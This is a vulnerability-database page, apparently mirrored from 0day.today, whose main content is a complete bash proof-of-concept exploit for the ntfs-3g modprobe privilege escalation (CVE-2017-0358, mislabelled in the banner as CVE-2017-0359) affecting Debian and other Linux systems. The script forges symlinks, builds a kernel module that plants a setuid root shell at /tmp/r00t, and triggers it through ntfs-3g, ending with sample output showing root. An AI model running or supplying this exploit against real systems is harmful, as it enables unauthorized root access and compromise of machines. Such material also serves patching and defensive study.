Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Debian 9 ntfs-3g - Privilege Escalation Exploit

🗓️ 04 Feb 2017 00:00:00Reported by Kristian Erik HermansenType 
zdt
 zdt🔗 0day.today👁 98 Views

Debian 9 ntfs-3g privilege escalation exploit affecting Debian 9/8/7, Ubuntu, Gento

Related
Code
ReporterTitlePublishedViews
Family
FreeBSD		diffoscope -- arbitrary file write
9 Feb 201700:00
freebsd
0day.today		ntfs-3g - Unsanitized modprobe Environment Privilege Escalation Vulnerability
14 Feb 201700:00
zdt
ArchLinux		[ASA-201702-14] diffoscope: arbitrary file overwrite
17 Feb 201700:00
archlinux
BDU FSTEC		The vulnerability of the diffoscope file and directory comparison tool lies in the lack of necessary checks during the analysis of archives. This allows a malicious actor to write data into arbitrary areas of disk space.
7 Jun 201800:00
bdu_fstec
Circl		CVE-2017-0358
14 Feb 201700:00
circl
CNVD		Linux ntfs-3g Elevation of Privilege Vulnerability
21 Feb 201700:00
cnvd
CVE		CVE-2017-0358
13 Apr 201815:00
cve
CVE		CVE-2017-0359
13 Apr 201816:00
cve
Cvelist		CVE-2017-0358 ntfs-3g: Modprobe influence vulnerability via environment variables
13 Apr 201815:00
cvelist
Cvelist		CVE-2017-0359 diffoscope writes to arbitrary locations on disk based on the contents of an untrusted archive
13 Apr 201816:00
cvelist
Rows per page
#!/bin/bash
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @"
echo "@  ntfs-3g local privilege escalation to root     @"
echo "@  Credits to Google Project Zero                 @"
echo "@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @"
echo "@  Tested: Debian 9 (Stretch)                     @"
echo "@  Date: 2017-02-03                               @"
echo "@  Link: https://goo.gl/A9I8Vq                    @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "
 
cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>
 
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <[email protected]>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
 
int init_module(void) {
  printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
  char *envp[] = { "HOME=/tmp", NULL };
  char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
  call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
  char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
  call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
  return 0;
}
 
void cleanup_module(void) {
  printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
EOF
 
cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o
 
all:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
 
clean:
    make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF
 
make 1>/dev/null 2>/dev/null || echo "[-] FAILED: your need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED: linux-image location non-default?"
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null 1>/dev/null 2>/dev/null
/tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have root. Don't be evil :)"
/tmp/r00t
 
echo << 'EOF'
$ whoami
user
$ ./cve-2017-0358.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @
@  ntfs-3g local privilege escalation to root     @
@  Credits to Google Project Zero                 @
@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @
@  Tested: Debian 9 (Stretch)                     @
@  Date: 2017-02-03                               @
@  Link: https://goo.gl/A9I8Vq                    @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ... 
[*] Building kernel module ... 
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF

#  0day.today [2018-04-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2017 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.08331
debian 9ntfs-3gprivilege escalationexploitcve-2017-0359google project zero
98